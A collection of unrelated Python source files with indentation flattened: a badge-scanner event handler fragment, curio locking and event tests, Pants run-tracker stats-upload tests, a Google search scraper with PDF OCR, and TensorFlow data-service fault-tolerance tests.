def on_event_received(self, val):
print(f"Scanné: {val}")
if val == 1: # Badge known
self.showChoices()
self.hideHome()
elif val == 2: # Badge unknown
self.hideHome()
self.showErrorPage(self.uid_test if self.test else self.uid)
elif val == 3:
self.hideHome()
self.showErrorNetwork()
|
test_sync.py
|
# test_sync.py
#
# Different test scenarios designed to run under management of a kernel
from collections import deque
from curio import *
import pytest
import threading
import time
import asyncio
# ---- Synchronization primitives
class TestEvent:
def test_event_get_wait(self, kernel):
results = []
async def event_setter(evt, seconds):
results.append('sleep')
await sleep(seconds)
results.append('event_set')
await evt.set()
async def event_waiter(evt):
results.append('wait_start')
results.append(evt.is_set())
await evt.wait()
results.append('wait_done')
results.append(evt.is_set())
evt.clear()
results.append(evt.is_set())
async def main():
evt = Event()
t1 = await spawn(event_waiter, evt)
t2 = await spawn(event_setter, evt, 1)
await t1.join()
await t2.join()
kernel.run(main())
assert results == [
'wait_start',
False,
'sleep',
'event_set',
'wait_done',
True,
False
]
def test_event_get_immediate(self, kernel):
results = []
async def event_setter(evt):
results.append('event_set')
await evt.set()
async def event_waiter(evt, seconds):
results.append('sleep')
await sleep(seconds)
results.append('wait_start')
await evt.wait()
results.append('wait_done')
async def main():
evt = Event()
t1 = await spawn(event_waiter, evt, 1)
t2 = await spawn(event_setter, evt)
await t1.join()
await t2.join()
kernel.run(main())
assert results == [
'sleep',
'event_set',
'wait_start',
'wait_done',
]
def test_event_wait_cancel(self, kernel):
results = []
async def event_waiter(evt):
results.append('event_wait')
try:
await evt.wait()
except CancelledError:
results.append('event_cancel')
async def event_cancel(seconds):
evt = Event()
task = await spawn(event_waiter, evt)
results.append('sleep')
await sleep(seconds)
results.append('cancel_start')
await task.cancel()
results.append('cancel_done')
kernel.run(event_cancel(1))
assert results == [
'sleep',
'event_wait',
'cancel_start',
'event_cancel',
'cancel_done',
]
def test_event_wait_timeout(self, kernel):
results = []
async def event_waiter(evt):
results.append('event_wait')
try:
await timeout_after(0.5, evt.wait())
except TaskTimeout:
results.append('event_timeout')
async def event_run(seconds):
evt = Event()
task = await spawn(event_waiter, evt)
results.append('sleep')
await sleep(seconds)
results.append('sleep_done')
await task.join()
kernel.run(event_run(1))
assert results == [
'sleep',
'event_wait',
'event_timeout',
'sleep_done',
]
def test_event_wait_notimeout(self, kernel):
results = []
async def event_waiter(evt):
results.append('event_wait')
try:
await timeout_after(1.0, evt.wait())
results.append('got event')
except TaskTimeout:
results.append('event_timeout')
evt.clear()
try:
await evt.wait()
results.append('got event')
except TaskTimeout:
results.append('bad timeout')
async def event_run():
evt = Event()
task = await spawn(event_waiter, evt)
results.append('sleep')
await sleep(0.25)
results.append('event_set')
await evt.set()
await sleep(1.0)
results.append('event_set')
await evt.set()
await task.join()
kernel.run(event_run())
assert results == [
'sleep',
'event_wait',
'event_set',
'got event',
'event_set',
'got event'
]
class TestLock:
def test_lock_sequence(self, kernel):
results = []
async def worker(lck, label):
results.append(label + ' wait')
results.append(lck.locked())
async with lck:
results.append(label + ' acquire')
await sleep(0.25)
results.append(label + ' release')
async def main():
lck = Lock()
t1 = await spawn(worker, lck, 'work1')
t2 = await spawn(worker, lck, 'work2')
t3 = await spawn(worker, lck, 'work3')
await t1.join()
await t2.join()
await t3.join()
kernel.run(main())
assert results == [
'work1 wait',
False,
'work1 acquire',
'work2 wait',
True,
'work3 wait',
True,
'work1 release',
'work2 acquire',
'work2 release',
'work3 acquire',
'work3 release',
]
def test_lock_acquire_cancel(self, kernel):
results = []
async def worker(lck):
results.append('lock_wait')
try:
async with lck:
results.append('never here')
except CancelledError:
results.append('lock_cancel')
async def worker_cancel(seconds):
lck = Lock()
async with lck:
task = await spawn(worker, lck)
results.append('sleep')
await sleep(seconds)
results.append('cancel_start')
await task.cancel()
results.append('cancel_done')
kernel.run(worker_cancel(1))
assert results == [
'sleep',
'lock_wait',
'cancel_start',
'lock_cancel',
'cancel_done',
]
def test_lock_acquire_timeout(self, kernel):
results = []
async def worker(lck):
results.append('lock_wait')
try:
await timeout_after(0.5, lck.acquire())
results.append('never here')
await lck.release()
except TaskTimeout:
results.append('lock_timeout')
async def worker_timeout(seconds):
lck = Lock()
async with lck:
w = await spawn(worker, lck)
results.append('sleep')
await sleep(seconds)
results.append('sleep_done')
await w.join()
kernel.run(worker_timeout(1))
assert results == [
'sleep',
'lock_wait',
'lock_timeout',
'sleep_done',
]
class TestRLock:
def test_rlock_reenter(self, kernel):
results = []
async def inner(lck, label):
results.append(lck.locked())
async with lck:
results.append(label + ' inner acquired')
results.append(label + ' inner releasing')
async def worker(lck, label):
results.append(lck.locked())
results.append(label + ' wait')
async with lck:
results.append(label + ' acquired')
await sleep(0.25)
await inner(lck, label)
results.append(label + ' releasing')
async def worker_simple(lck):
results.append('simple wait')
async with lck:
results.append('simple acquired')
results.append('simple releasing')
async def main():
lck = RLock()
t1 = await spawn(worker, lck, 'work1')
t2 = await spawn(worker, lck, 'work2')
t3 = await spawn(worker_simple, lck)
await t1.join()
await t2.join()
await t3.join()
kernel.run(main())
assert results == [
False,
'work1 wait',
'work1 acquired',
True,
'work2 wait',
'simple wait',
True,
'work1 inner acquired',
'work1 inner releasing',
'work1 releasing',
'work2 acquired',
True,
'work2 inner acquired',
'work2 inner releasing',
'work2 releasing',
'simple acquired',
'simple releasing'
]
def test_rlock_notowner(self, kernel):
async def child1(lck):
await lck.acquire()
await sleep(0.25)
await lck.release()
async def child2(lck):
await sleep(0.1)
with pytest.raises(RuntimeError):
await lck.release()
async def main():
lck = RLock()
with pytest.raises(RuntimeError):
await lck.release()
t1 = await spawn(child1, lck)
t2 = await spawn(child2, lck)
await t1.join()
await t2.join()
kernel.run(main)
class TestSemaphore:
def test_sema_sequence(self, kernel):
results = []
async def worker(sema, label):
results.append(label + ' wait')
results.append(sema.locked())
async with sema:
assert sema.value == 0
results.append(label + ' acquire')
await sleep(0.25)
results.append(label + ' release')
async def main():
sema = Semaphore()
t1 = await spawn(worker, sema, 'work1')
t2 = await spawn(worker, sema, 'work2')
t3 = await spawn(worker, sema, 'work3')
await t1.join()
await t2.join()
await t3.join()
kernel.run(main())
assert results == [
'work1 wait',
False,
'work1 acquire',
'work2 wait',
True,
'work3 wait',
True,
'work1 release',
'work2 acquire',
'work2 release',
'work3 acquire',
'work3 release',
]
def test_sema_sequence2(self, kernel):
results = []
async def worker(sema, label, seconds):
results.append(label + ' wait')
results.append(sema.locked())
async with sema:
results.append(label + ' acquire')
await sleep(seconds)
results.append(label + ' release')
async def main():
sema = Semaphore(2)
t1 = await spawn(worker, sema, 'work1', 0.25)
t2 = await spawn(worker, sema, 'work2', 0.30)
t3 = await spawn(worker, sema, 'work3', 0.35)
await t1.join()
await t2.join()
await t3.join()
kernel.run(main())
assert results == [
'work1 wait', # Both work1 and work2 admitted
False,
'work1 acquire',
'work2 wait',
False,
'work2 acquire',
'work3 wait',
True,
'work1 release',
'work3 acquire',
'work2 release',
'work3 release',
]
def test_sema_acquire_cancel(self, kernel):
results = []
async def worker(lck):
results.append('lock_wait')
try:
async with lck:
results.append('never here')
except CancelledError:
results.append('lock_cancel')
async def worker_cancel(seconds):
lck = Semaphore()
async with lck:
task = await spawn(worker, lck)
results.append('sleep')
await sleep(seconds)
results.append('cancel_start')
await task.cancel()
results.append('cancel_done')
kernel.run(worker_cancel(1))
assert results == [
'sleep',
'lock_wait',
'cancel_start',
'lock_cancel',
'cancel_done',
]
def test_sema_acquire_timeout(self, kernel):
results = []
async def worker(lck):
results.append('lock_wait')
try:
await timeout_after(0.5, lck.acquire())
results.append('never here')
await lck.release()
except TaskTimeout:
results.append('lock_timeout')
async def worker_timeout(seconds):
lck = Semaphore()
async with lck:
w = await spawn(worker, lck)
results.append('sleep')
await sleep(seconds)
results.append('sleep_done')
await w.join()
kernel.run(worker_timeout(1))
assert results == [
'sleep',
'lock_wait',
'lock_timeout',
'sleep_done',
]
class TestCondition:
def test_cond_sequence(self, kernel):
results = []
async def consumer(cond, q, label):
while True:
async with cond:
if not q:
results.append(label + ' wait')
await cond.wait()
item = q.popleft()
if item is None:
break
results.append((label, item))
results.append(label + ' done')
async def producer(cond, q, count, nproducers):
for n in range(count):
async with cond:
q.append(n)
results.append(('producing', n))
await cond.notify()
await sleep(0.1)
for n in range(nproducers):
async with cond:
q.append(None)
results.append(('ending', n))
await cond.notify()
await sleep(0.1)
async def main():
cond = Condition(Lock())
q = deque()
t1 = await spawn(consumer, cond, q, 'cons1')
t2 = await spawn(consumer, cond, q, 'cons2')
t3 = await spawn(producer, cond, q, 4, 2)
await t1.join()
await t2.join()
await t3.join()
kernel.run(main())
assert results == [
'cons1 wait',
'cons2 wait',
('producing', 0),
('cons1', 0),
'cons1 wait',
('producing', 1),
('cons2', 1),
'cons2 wait',
('producing', 2),
('cons1', 2),
'cons1 wait',
('producing', 3),
('cons2', 3),
'cons2 wait',
('ending', 0),
('cons1 done'),
('ending', 1),
('cons2 done')
]
def test_cond_wait_cancel(self, kernel):
results = []
async def worker(cond):
try:
async with cond:
results.append('cond_wait')
await cond.wait()
results.append('never here')
except CancelledError:
results.append('worker_cancel')
async def worker_cancel(seconds):
cond = Condition()
task = await spawn(worker, cond)
results.append('sleep')
await sleep(seconds)
results.append('cancel_start')
await task.cancel()
results.append('cancel_done')
kernel.run(worker_cancel(1))
assert results == [
'sleep',
'cond_wait',
'cancel_start',
'worker_cancel',
'cancel_done',
]
def test_cond_wait_timeout(self, kernel):
results = []
async def worker(cond):
try:
async with cond:
results.append('cond_wait')
await timeout_after(0.25, cond.wait())
results.append('never here')
except TaskTimeout:
results.append('worker_timeout')
async def worker_cancel(seconds):
cond = Condition()
task = await spawn(worker, cond)
results.append('sleep')
await sleep(seconds)
results.append('done')
await task.join()
kernel.run(worker_cancel(1))
assert results == [
'sleep',
'cond_wait',
'worker_timeout',
'done'
]
def test_cond_notify_all(self, kernel):
results = []
async def worker(cond):
async with cond:
results.append('cond_wait')
await cond.wait()
results.append('wait_done')
async def worker_notify(seconds):
cond = Condition()
t1 = await spawn(worker, cond)
t2 = await spawn(worker, cond)
t3 = await spawn(worker, cond)
results.append('sleep')
await sleep(seconds)
async with cond:
results.append('notify')
await cond.notify_all()
results.append('done')
await t1.join()
await t2.join()
await t3.join()
kernel.run(worker_notify(1))
assert results == [
'sleep',
'cond_wait',
'cond_wait',
'cond_wait',
'notify',
'done',
'wait_done',
'wait_done',
'wait_done',
]
def test_cond_waitfor(self, kernel):
results = []
async def consumer(cond, q, label):
async with cond:
results.append(label + ' waitfor')
await cond.wait_for(lambda: len(q) > 2)
results.append((label, len(q)))
results.append(label + ' done')
async def producer(cond, q, count):
for n in range(count):
async with cond:
q.append(n)
results.append(('producing', n))
await cond.notify()
await sleep(0.1)
async def main():
cond = Condition()
q = deque()
t1 = await spawn(consumer, cond, q, 'cons1')
t2 = await spawn(consumer, cond, q, 'cons2')
t3 = await spawn(producer, cond, q, 4)
await t1.join()
await t2.join()
await t3.join()
kernel.run(main())
assert results == [
'cons1 waitfor',
'cons2 waitfor',
('producing', 0),
('producing', 1),
('producing', 2),
('cons1', 3),
'cons1 done',
('producing', 3),
('cons2', 4),
'cons2 done'
]
def test_condition_error(self, kernel):
async def main():
c = Condition()
with pytest.raises(RuntimeError):
await c.notify()
with pytest.raises(RuntimeError):
await c.wait()
kernel.run(main)
class TestUniversalEvent:
def test_uevent_get_wait(self, kernel):
results = []
async def event_setter(evt, seconds):
results.append('sleep')
await sleep(seconds)
results.append('event_set')
await evt.set()
async def event_waiter(evt):
results.append('wait_start')
results.append(evt.is_set())
await evt.wait()
results.append('wait_done')
results.append(evt.is_set())
evt.clear()
results.append(evt.is_set())
async def main():
evt = UniversalEvent()
t1 = await spawn(event_waiter, evt)
t2 = await spawn(event_setter, evt, 1)
await t1.join()
await t2.join()
kernel.run(main())
assert results == [
'wait_start',
False,
'sleep',
'event_set',
'wait_done',
True,
False
]
def test_uevent_get_twait(self, kernel):
results = []
async def event_setter(evt, seconds):
results.append('sleep')
await sleep(seconds)
results.append('event_set')
await evt.set()
def event_waiter(evt):
results.append('wait_start')
results.append(evt.is_set())
evt.wait()
results.append('wait_done')
results.append(evt.is_set())
evt.clear()
results.append(evt.is_set())
async def main():
evt = UniversalEvent()
t1 = threading.Thread(target=event_waiter, args=(evt,))
t1.start()
t2 = await spawn(event_setter, evt, 1)
await run_in_thread(t1.join)
await t2.join()
kernel.run(main())
assert results == [
'wait_start',
False,
'sleep',
'event_set',
'wait_done',
True,
False
]
def test_uevent_get_asyncio_set(self, kernel):
results = []
async def event_setter(evt, seconds):
results.append('sleep')
await asyncio.sleep(seconds)
results.append('event_set')
await evt.set()
async def event_waiter(evt):
results.append('wait_start')
results.append(evt.is_set())
await evt.wait()
results.append('wait_done')
results.append(evt.is_set())
evt.clear()
results.append(evt.is_set())
async def main():
evt = UniversalEvent()
t1 = await spawn(event_waiter, evt)
await sleep(0.05)
t2 = threading.Thread(target=asyncio.run, args=[event_setter(evt, 1)])
t2.start()
await t1.join()
await run_in_thread(t2.join)
kernel.run(main())
assert results == [
'wait_start',
False,
'sleep',
'event_set',
'wait_done',
True,
False
]
def test_uevent_get_asyncio_wait(self, kernel):
results = []
async def event_setter(evt, seconds):
results.append('sleep')
await sleep(seconds)
results.append('event_set')
await evt.set()
async def event_waiter(evt):
results.append('wait_start')
results.append(evt.is_set())
await evt.wait()
results.append('wait_done')
results.append(evt.is_set())
evt.clear()
results.append(evt.is_set())
async def main():
evt = UniversalEvent()
t1 = threading.Thread(target=asyncio.run, args=[event_waiter(evt)])
t1.start()
await sleep(0.1)
t2 = await spawn(event_setter, evt, 1)
await run_in_thread(t1.join)
await t2.join()
kernel.run(main())
assert results == [
'wait_start',
False,
'sleep',
'event_set',
'wait_done',
True,
False
]
def test_repr():
# For test coverage
for cls in [Lock, Event, Semaphore, Condition, RLock, UniversalEvent ]:
repr(cls())
|
test_run_tracker.py
|
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import http.server
import json
import threading
from urllib.parse import parse_qs
from pants.auth.cookies import Cookies
from pants.goal.run_tracker import RunTracker
from pants.testutil.test_base import TestBase
from pants.util.contextutil import temporary_file_path
from pants.version import VERSION
class RunTrackerTest(TestBase):
def assert_upload_stats(self, *, response_code) -> None:
stats = {'stats': {'foo': 'bar', 'baz': 42}}
class Handler(http.server.BaseHTTPRequestHandler):
def do_POST(handler):
try:
if handler.path.startswith('/redirect'):
code = int(handler.path[-3:])
handler.send_response(code)
handler.send_header('location', mk_url('/upload'))
handler.end_headers()
else:
self.assertEqual('/upload', handler.path)
stats_version = handler.headers['X-Pants-Stats-Version']
self.assertIn(stats_version, {"1", "2"})
self.assertEqual(handler.headers['User-Agent'], f"pants/v{VERSION}")
length = int(handler.headers['Content-Length'])
content = handler.rfile.read(length).decode()
if stats_version == "2":
self.assertEqual('application/json', handler.headers['Content-type'])
decoded_post_data = json.loads(content)
self.assertEqual(len(decoded_post_data), 1)
builds = decoded_post_data['builds']
self.assertEqual(len(builds), 1)
received_stats = builds[0]
else:
self.assertEqual('application/x-www-form-urlencoded', handler.headers['Content-type'])
received_stats = {k: json.loads(v[0]) for k, v in parse_qs(content).items()}
self.assertEqual(stats, received_stats)
handler.send_response(response_code)
handler.end_headers()
except Exception:
handler.send_response(400) # Ensure the main thread knows the test failed.
raise
server_address = ('', 0)
server = http.server.HTTPServer(server_address, Handler)
host, port = server.server_address
def mk_url(path):
return f'http://{host}:{port}{path}'
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
self.context(for_subsystems=[Cookies])
self.assertTrue(RunTracker.post_stats(mk_url('/upload'), stats, stats_version=1))
self.assertTrue(RunTracker.post_stats(mk_url('/upload'), stats, stats_version=2))
self.assertTrue(RunTracker.post_stats(mk_url('/redirect307'), stats, stats_version=1))
self.assertFalse(RunTracker.post_stats(mk_url('/redirect302'), stats, stats_version=2))
server.shutdown()
server.server_close()
def test_upload_stats(self):
self.assert_upload_stats(response_code=200)
self.assert_upload_stats(response_code=201)
self.assert_upload_stats(response_code=204)
def test_invalid_stats_version(self):
stats = {'stats': {'foo': 'bar', 'baz': 42}}
url = 'http://example.com/upload/'
with self.assertRaises(ValueError):
RunTracker.post_stats(url, stats, stats_version=0)
with self.assertRaises(ValueError):
RunTracker.post_stats(url, stats, stats_version=None)
with self.assertRaises(ValueError):
RunTracker.post_stats(url, stats, stats_version=9)
with self.assertRaises(ValueError):
RunTracker.post_stats(url, stats, stats_version="not a number")
def test_write_stats_to_json_file(self):
# Set up
stats = {'stats': {'foo': 'bar', 'baz': 42}}
# Execute & verify
with temporary_file_path() as file_name:
RunTracker.write_stats_to_json(file_name, stats)
with open(file_name, 'r') as f:
result = json.load(f)
self.assertEqual(stats, result)
def test_create_dict_with_nested_keys_and_val(self):
keys = []
with self.assertRaises(ValueError):
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something')
keys += ['one']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': 'something'}
)
keys += ['two']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': {'two': 'something'}}
)
keys += ['three']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': {'two': {'three': 'something'}}}
)
keys += ['four']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': {'two': {'three': {'four': 'something'}}}}
)
def test_merge_list_of_keys_into_dict(self):
data = {}
keys = []
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'something')
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'something', -1)
keys = ['key']
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'something', 1)
keys = ['a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'O-N-E')
self.assertEqual(data, {'a': 'O-N-E'})
keys = ['one', 'two', 'three']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'T-H-R-E-E')
self.assertEqual(data, {'one': {'two': {'three': 'T-H-R-E-E'}}, 'a': 'O-N-E'})
keys = ['one', 'two', 'a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'L-A')
self.assertEqual(data, {'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E'}}, 'a': 'O-N-E'})
keys = ['c', 'd', 'e', 'f']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'F-O-U-R')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E'}}, 'a': 'O-N-E',
'c': {'d': {'e': {'f': 'F-O-U-R'}}}
})
keys = ['one', 'two', 'x', 'y']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'W-H-Y')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y'}}}, 'a': 'O-N-E',
'c': {'d': {'e': {'f': 'F-O-U-R'}}}
})
keys = ['c', 'd', 'e', 'g', 'h']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'H-E-L-L-O')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y'}}}, 'a': 'O-N-E',
'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O'}}}}
})
keys = ['one', 'two', 'x', 'z']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'Z-E-D')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O'}}}}
})
keys = ['c', 'd', 'e', 'g', 'i']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'E-Y-E')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O', 'i': 'E-Y-E'}}}}
})
keys = ['a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'new O-N-E')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'new O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O', 'i': 'E-Y-E'}}}}
})
keys = ['one', 'two', 'a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'L-A-L-A')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A-L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'new O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O', 'i': 'E-Y-E'}}}}
})
keys = ['one', 'two', 'a', 'b', 'c']
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'new A')
|
googlesearch.py
|
"""
Created on May 5, 2017
@author: anthony
"""
import math
import tempfile
import urllib
from collections import deque
from threading import Thread
from time import sleep
from urllib.request import urlopen
from urllib.request import urlretrieve
import numpy as np
import requests
from PIL.PpmImagePlugin import PpmImageFile
from bs4 import BeautifulSoup
from numpy import long
from pdf2image import convert_from_path
from pytesseract import image_to_string
class GoogleSearch:
USER_AGENT = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ 58.0.3029.81 Safari/537.36"
SEARCH_URL = "https://google.com/search"
RESULT_SELECTOR = "#rso .g .r a:first-child:not(.fl)"
TOTAL_SELECTOR = "#result-stats"
RESULTS_PER_PAGE = 10
DEFAULT_HEADERS = {
'User-Agent': USER_AGENT,
"Accept-Language": "pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7",
}
__total = None
@staticmethod
def build_request(url, headers=None):
payload = {}
headers = GoogleSearch.DEFAULT_HEADERS if headers is None else headers
resp = requests.request("GET", url, headers=headers, data=payload)
html = ''
if resp.raw.headers.get('Content-Type') == 'application/pdf':
tf = tempfile.NamedTemporaryFile()
urlretrieve(url, tf.name)
images = np.array(convert_from_path(tf.name), dtype=PpmImageFile.__class__)
extracted_text = np.array([image_to_string(img, lang='por') for img in images])
html = "\n".join(extracted_text)
else:
html = resp.text
resp.close()
return html
def set_total(self, soup):
if self.__total is None:
element_html_total = soup.select(GoogleSearch.TOTAL_SELECTOR)
total_text = element_html_total[0].encode('utf-8')
self.__total = long(''.join(text for text in str(total_text) if text.isdigit()))
def search(self, query, num_results=10, prefetch_pages=True, prefetch_threads=10):
search_results = []
pages = int(math.ceil(num_results / float(GoogleSearch.RESULTS_PER_PAGE)))
fetcher_threads = deque([])
for i in range(pages):
start = i * GoogleSearch.RESULTS_PER_PAGE
resp = GoogleSearch.build_request(GoogleSearch.SEARCH_URL + "?q=" + urllib.request.quote(query) + ("" if start == 0 else ("&start=" + str(start))))
soup = BeautifulSoup(resp, "lxml")
results = GoogleSearch.parse_results(soup.select(GoogleSearch.RESULT_SELECTOR))
self.set_total(soup)
if len(search_results) + len(results) > num_results:
del results[num_results - len(search_results):]
search_results += results
if prefetch_pages:
for result in results:
while True:
running = 0
for thread in fetcher_threads:
if thread.is_alive():
running += 1
if running < prefetch_threads:
break
sleep(1)
fetcher_thread = Thread(target=result.getText)
fetcher_thread.start()
fetcher_threads.append(fetcher_thread)
for thread in fetcher_threads:
thread.join()
return SearchResponse(search_results, self.__total)
@staticmethod
def parse_results(results):
return [SearchResult(result.text, result.get('href')) for result in results if result.get('href') and result.text]
class SearchResponse:
def __init__(self, results, total):
self.results = results
self.total = total
class SearchResult:
def __init__(self, title, url):
self.title = title
self.url = url
self.__text = None
self.__markup = None
def getText(self):
markup = self.getMarkup()
if self.__text is None and markup:
soup = BeautifulSoup(markup, "lxml")
for junk in soup(["script", "style"]):
junk.extract()
self.__text = soup.get_text()
return self.__text
def getMarkup(self):
if self.__markup is None:
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36'}
self.__markup = GoogleSearch.build_request(self.url, headers)
return self.__markup
def __str__(self):
return str(self.__dict__)
def __unicode__(self):
return unicode(self.__str__())
def __repr__(self):
return self.__str__()
if __name__ == "__main__":
# search = GoogleSearch()
# i = 1
# query = " ".join(sys.argv[1:])
# if len(query) == 0:
# query = "python"
# count = 10
# print("Fetching first " + str(count) + " results for \"" + query + "\"...")
# response = search.search(query, count)
# print("TOTAL: " + str(response.total) + " RESULTS")
# for result in response.results:
# print("RESULT #" + str(i) + ": " + result.url + "\n\n")
# i += 1
response = GoogleSearch.build_request(
"https://ww2.stj.jus.br/processo/dj/documento?seq_documento=20012703&data_pesquisa=02/10/2018¶metro=42",
{
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36'
}
)
print(response)
|
fault_tolerance_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf.data service ops where servers are started late or preempted."""
import threading
import time
from absl.testing import parameterized
from tensorflow.python.data.experimental.kernel_tests.service import test_base as data_service_test_base
from tensorflow.python.data.experimental.ops import data_service_ops
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import combinations
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
TMP_WORK_DIR = data_service_test_base.TMP_WORK_DIR
NO_WORK_DIR = data_service_test_base.NO_WORK_DIR
class FaultToleranceTest(data_service_test_base.TestBase,
parameterized.TestCase):
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherStop(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
ds = self.make_distributed_range_dataset(num_elements, cluster)
iterator = iter(ds)
results = []
results.append(next(iterator).numpy())
cluster.stop_dispatcher()
# After the dispatcher dies, the worker should continue providing the rest
# of the dataset's elements.
for _ in range(num_elements - 1):
results.append(next(iterator).numpy())
self.assertEqual(results, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherRestartBeforeReading(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
ds = self.make_distributed_range_dataset(num_elements, cluster)
cluster.restart_dispatcher()
self.assertDatasetProduces(ds, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherRestartDuringReading(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
ds = self.make_distributed_range_dataset(num_elements, cluster)
iterator = iter(ds)
results = []
for _ in range(num_elements // 2):
results.append(next(iterator).numpy())
cluster.restart_dispatcher()
for elem in iterator:
results.append(elem.numpy())
self.assertEqual(list(range(num_elements)), results)
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherRestartDuringDistributedEpoch(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
ds = self.make_distributed_range_dataset(
num_elements, cluster, processing_mode="distributed_epoch")
iterator = iter(ds)
results = []
for _ in range(num_elements // 2):
results.append(next(iterator).numpy())
cluster.restart_dispatcher()
for elem in iterator:
results.append(elem.numpy())
self.assertEqual(list(range(num_elements)), results)
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherRestartDuringDistributedEpochRepeat(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
repetitions = 5
breakpoints = [50, 250, 450, 500]
ds = dataset_ops.Dataset.range(num_elements)
ds = ds.repeat(repetitions)
ds = self.make_distributed_dataset(
ds, cluster, processing_mode="distributed_epoch")
iterator = iter(ds)
results = []
for breakpoint_ in breakpoints:
for _ in range(len(results), breakpoint_):
results.append(next(iterator).numpy())
cluster.restart_dispatcher()
self.assertCountEqual(repetitions * list(range(num_elements)), results)
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherRestartBetweenIterations(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
ds = self.make_distributed_range_dataset(100, cluster)
self.assertDatasetProduces(ds, list(range(num_elements)))
cluster.restart_dispatcher()
self.assertDatasetProduces(ds, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherManyRestarts(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements_start = 10
num_elements_end = 15
datasets = []
for num_elements in range(num_elements_start, num_elements_end):
datasets.append(
self.make_distributed_range_dataset(num_elements, cluster))
cluster.restart_dispatcher()
for ds, num_elements in zip(datasets,
range(num_elements_start, num_elements_end)):
self.assertDatasetProduces(ds, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherAndWorkerRestart(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
ds = self.make_distributed_range_dataset(num_elements, cluster)
cluster.restart_dispatcher()
cluster.workers[0].restart()
self.assertDatasetProduces(ds, list(range(num_elements)))
cluster.restart_dispatcher()
cluster.workers[0].restart()
self.assertDatasetProduces(ds, list(range(num_elements)))
